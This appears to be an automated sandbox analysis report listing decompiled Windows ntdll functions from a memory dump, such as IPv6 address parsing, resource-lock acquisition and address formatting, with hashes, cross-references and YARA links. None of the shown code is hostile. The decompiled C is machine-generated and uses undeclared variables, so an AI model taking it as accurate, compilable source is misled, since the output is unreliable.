String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$m7Pw
API String ID: 3901378454-3082212618
Opcode ID: 01b686058315b1a6d03843651c87880e787137fa004a72d4937e02a188c1abed
Instruction ID: 3189309a9ed8af18215a5cbe5e6d5940eb83ac165bb499ce3c7a33bd8813e358
Opcode Fuzzy Hash: 01b686058315b1a6d03843651c87880e787137fa004a72d4937e02a188c1abed
Instruction Fuzzy Hash: B7419B7164061D7ADF20AB94DC85FEBB3BCAB94704F0005E5B505A61C1E771AB858F61

Uniqueness

Uniqueness Score: -1.00%

Function 00950B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00950B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00928980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0091DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00950CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00950CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E009506BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E009506BA(_t135, _t178) == 0 || E00950A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00950CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00950CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E009506BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E009506BA(_t124, _t142) == 0 || E00950A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x00950b21
0x00950b24
0x00950b27
0x00950b2a
0x00950b2d
0x00950b30
0x00950b33
0x00950b36
0x00950b39
0x00950b3e
0x00950c65
0x00950c68
0x00950c6a
0x00950c6f
0x0097eb42
0x00000000
0x00000000
0x0097eb48
0x0097eb48
0x00950c75
0x00950c7a
0x0097eb54
0x00000000
0x00000000
0x00000000
0x0097eb5a
0x00950c80
0x00950c84
0x0097eb98
0x00000000
0x00000000
0x0097eba6
0x00950cb8
0x00950cba
0x00950cd3
0x00950cda
0x00950ce4
0x00950ce9
0x00000000
0x00950cec
0x00950c8c
0x0097eb63
0x00000000
0x00000000
0x0097eb70
0x0097eb75
0x0097eb7d
0x00000000
0x00000000
0x0097eb8c
0x00000000
0x0097eb8c
0x00950c96
0x00000000
0x00000000
0x00950ca2
0x00950cac
0x00950cb4
0x00000000
0x00000000
0x00950b44
0x00950b47
0x00950b49
0x00000000
0x00000000
0x00950b4f
0x00950b50
0x00000000
0x00000000
0x00950b56
0x00950b62
0x00950b7c
0x00950bac
0x00950a0f
0x0097eaaa
0x00000000
0x0097eac4
0x0097eac4
0x00950bd0
0x00950bd0
0x00950bd4
0x00950bd9
0x00000000
0x00000000
0x00950bdb
0x00950be0
0x0097eb0e
0x00950a1a
0x00000000
0x00950a1a
0x0097eb1a
0x0097eb1f
0x0097eb27
0x00000000
0x00000000
0x0097eb36
0x00000000
0x0097eb36
0x00950bea
0x00000000
0x00000000
0x00950bf6
0x00950c00
0x00950c03
0x00950c0b
0x00000000
0x00950c0b
0x0097eaaa
0x00000000
0x00950a15
0x00950bb6
0x00000000
0x00950bc6
0x00950bc6
0x00950bcb
0x00950c15
0x00000000
0x00000000
0x00950c1d
0x00950c20
0x00950c21
0x00950c24
0x00950c24
0x00950c26
0x00000000
0x00950c26
0x00950bcd
0x00000000
0x00950bcd
0x00950b89
0x00950b89
0x00950b90
0x00000000
0x00000000
0x00950b96
0x00000000
0x00950b96
0x00950a04
0x00950a04
0x00950b9a
0x00950b9a
0x00950b9b
0x00950b9f
0x00000000
0x00000000
0x00000000
0x00950ba5
0x00950ac7
0x00950aca
0x0097eacf
0x00000000
0x0097eade
0x0097eade
0x0097eae3
0x00000000
0x00000000
0x0097eaf3
0x0097eaf6
0x0097eaf7
0x0097eafe
0x0097eb01
0x00000000
0x0097eb01
0x0097eacf
0x00950ad0
0x00950ad4
0x00000000
0x00000000
0x00950ada
0x00950ae6
0x00950c34
0x00000000
0x00950c47
0x00950c49
0x00950c4a
0x00950c4e
0x00950c51
0x00950c54
0x00950c57
0x00950c5a
0x00000000
0x00000000
0x00000000
0x00950c60
0x00950afb
0x00950afe
0x00950b02
0x00950b05
0x00950b08
0x00000000
0x00950b08
0x00950ae6
0x00950b44
0x009509f8
0x009509f8
0x009509f9
0x00000000
0x00000000
0x0097eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 00950BF6
__fassign.LIBCMT ref: 00950CA2

Strings

:, xrefs: 00950AC7
., xrefs: 00950A0C
:, xrefs: 00950BA9

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: c83b3e10928f01a0504d1eaaeace5ad2196d40e8ed0cab7208212e9123c3becd
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 0CA1B271D0030ADFDF24CF6AC8457BEB7B8AF96306F24896ADC82A7241D7345A49CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00950554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00950554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009f01c0;
									_push(_t144);
									_push(0);
									_t51 = E0090F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00954FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00963F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00963F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0099217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00963F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00953915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009f01c0;
												_push(_t138);
												_push(0);
												_t58 = E0090F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00954FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00963F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00963F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0099217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00963F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00953915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00935384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0090F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00953915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0090F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00953915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0090F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00953915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00935329(_t110, _t138);
																_t69 = E009353A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x0095055a
0x0095055d
0x00950563
0x00950566
0x009505d8
0x009505e2
0x009505e5
0x00000000
0x009505e7
0x009505e7
0x009505ea
0x009505f3
0x009505f3
0x00950568
0x00950568
0x00950568
0x00950569
0x00950569
0x00950569
0x0095056b
0x00000000
0x00000000
0x0097217f
0x00972183
0x0097225b
0x0097225f
0x00972189
0x0097218c
0x0097218f
0x00972194
0x00972199
0x0097219d
0x009721a0
0x009721a2
0x009721ce
0x009721ce
0x009721ce
0x009721d0
0x009721d6
0x009721de
0x009721e2
0x009721e8
0x009721e9
0x009721ec
0x009721f1
0x009721f6
0x00000000
0x00000000
0x009721f8
0x009721fb
0x00972206
0x0097220b
0x0097220c
0x00972217
0x00972226
0x0097222b
0x0097222c
0x0097222f
0x00972232
0x00972235
0x00972235
0x0097223a
0x0097223f
0x00972241
0x00972243
0x00972248
0x00972248
0x0097224d
0x0097224f
0x00972262
0x00972263
0x00972268
0x00972269
0x00972269
0x00972269
0x0097226d
0x00000000
0x00000000
0x00972276
0x00972279
0x0097227e
0x00972283
0x00972287
0x0097228a
0x0097228d
0x0097228f
0x009722bc
0x009722bc
0x009722bc
0x009722be
0x009722c4
0x009722cc
0x009722d0
0x009722d6
0x009722d7
0x009722da
0x009722df
0x009722e4
0x00000000
0x00000000
0x009722e6
0x009722e9
0x009722f4
0x009722f9
0x009722fa
0x00972305
0x00972314
0x00972319
0x0097231a
0x0097231d
0x00972320
0x00972323
0x00972323
0x00972328
0x0097232d
0x0097232f
0x00972331
0x00972336
0x00972336
0x0097233b
0x0097233d
0x00972350
0x00972351
0x00972356
0x00972359
0x00972359
0x0097235b
0x0097235d
0x00935367
0x0093536b
0x00935372
0x00000000
0x00000000
0x00000000
0x00000000
0x00972363
0x00972363
0x00972369
0x0097236a
0x0097236c
0x00972371
0x00972373
0x00000000
0x00972379
0x00972379
0x0097237a
0x0097237f
0x0097237f
0x00972385
0x00972386
0x00972389
0x0097238e
0x00972390
0x00935378
0x0093537c
0x00972396
0x00972396
0x00972397
0x0097239c
0x009723a2
0x009723a3
0x009723a6
0x009723ab
0x009723ad
0x00000000
0x009723b3
0x009723b3
0x009723b4
0x009723b9
0x009723ba
0x009723ba
0x009723bc
0x009723bf
0x00000000
0x00000000
0x00969153
0x00969158
0x0096915a
0x0096915e
0x00969160
0x00000000
0x00969166
0x00969166
0x00969171
0x00969176
0x00969176
0x00000000
0x00969160
0x009723c6
0x009723ce
0x009723d7
0x009723d7
0x009723ad
0x00972390
0x00972373
0x0097233f
0x0097233f
0x00000000
0x0097233f
0x00972291
0x00972291
0x00972293
0x00972295
0x0097229a
0x009722a1
0x009722a3
0x009722a7
0x009722a9
0x00000000
0x00000000
0x009722ab
0x009722ad
0x009722af
0x00000000
0x00000000
0x00000000
0x009722af
0x009722b1
0x009722b4
0x009722b4
0x009722b6
0x009353be
0x009353be
0x009353be
0x009353c0
0x00000000
0x00000000
0x009353cb
0x009353ce
0x009353d0
0x009353d4
0x009353d6
0x00000000
0x009353d8
0x009353e3
0x009353ea
0x009353ea
0x00000000
0x009353d6
0x00000000
0x00000000
0x00000000
0x00000000
0x009722b6
0x00000000
0x0097228f
0x00972349
0x0097234d
0x00972251
0x00972251
0x00000000
0x00972251
0x009721a4
0x009721a4
0x009721a6
0x009721a8
0x009721ac
0x009721b6
0x009721b8
0x009721bc
0x009721be
0x00000000
0x00000000
0x009721c0
0x009721c2
0x009721c4
0x00000000
0x00000000
0x00000000
0x009721c4
0x009721c6
0x009721c6
0x009721c8
0x00000000
0x00000000
0x00000000
0x00000000
0x009721c8
0x009721a2
0x00000000
0x00972183
0x0095057b
0x0095057d
0x00950581
0x00950583
0x00972178
0x00000000
0x00950589
0x0095058f
0x0095058f
0x00950583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00972206

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009722FC
RTL: Resource at %p, xrefs: 0097221D, 0097230B
RTL: Re-Waiting, xrefs: 0097223A, 00972328
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 0097220E

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: a49bb86294a84375fe13ad321e4524786f80ad17bfb7e71ac7956e2621d0bc3c
Instruction ID: 34a331877e6935b1f84647ee9600a8807eb2a515549d6a15d48567cc22dc07bc
Opcode Fuzzy Hash: a49bb86294a84375fe13ad321e4524786f80ad17bfb7e71ac7956e2621d0bc3c
Instruction Fuzzy Hash: DB511B727542056FEB14CB19CC81FA633ADAFD8711F21C229FD59DB286E971EC418790

Uniqueness

Uniqueness Score: -1.00%

Function 009514C0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E009514C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x9f2088; // 0x7750376d
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00947707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009513CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00947707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00947707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00912340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0091E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x009514c0
0x009514cb
0x009514d2
0x009514d6
0x009514da
0x009514de
0x009514e3
0x0095157a
0x0095157a
0x009514f1
0x009514f3
0x0097ea0f
0x00000000
0x0097ea15
0x00000000
0x0097ea15
0x009514f9
0x009514f9
0x009514fe
0x00951504
0x0097ea1a
0x0097ea1f
0x0097ea21
0x0097ea22
0x0097ea27
0x0097ea2a
0x0097ea2a
0x00951515
0x00951517
0x0095156d
0x00951572
0x00951575
0x00951575
0x0095151e
0x0097ea50
0x0097ea55
0x0097ea58
0x0097ea58
0x0095152e
0x00951531
0x00951533
0x00000000
0x00951535
0x00951541
0x00951549
0x00951549
0x00951533
0x009514f3
0x00951559

APIs

___swprintf_l.LIBCMT ref: 0097EA22

Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 0095146B
Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 00951490

___swprintf_l.LIBCMT ref: 0095156D

Strings

]:%u, xrefs: 0097EA47
m7Pw, xrefs: 009514CB
%%%u, xrefs: 00951564

Memory Dump Source

Source File: 00000005.00000002.2170985187.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000005.00000002.2170979319.00000000008F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171051048.00000000009E0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171054885.00000000009F0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171058930.00000000009F4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171062622.00000000009F7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171066339.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2171091858.0000000000A60000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u$m7Pw
API String ID: 48624451-2264263038
Opcode ID: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
Instruction ID: 89db2ac7ae0434728841614becbdb4821c7fbb1c5351cb5bb8c3ac0fca1ce611
Opcode Fuzzy Hash: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
Instruction Fuzzy Hash: 0F21C172A00219ABCF21DF59CC41BEEB3BCAB94705F844451FC46D3140EB74AA998BE1

Uniqueness

Uniqueness Score: -1.00%

Function 009353A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E009353A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
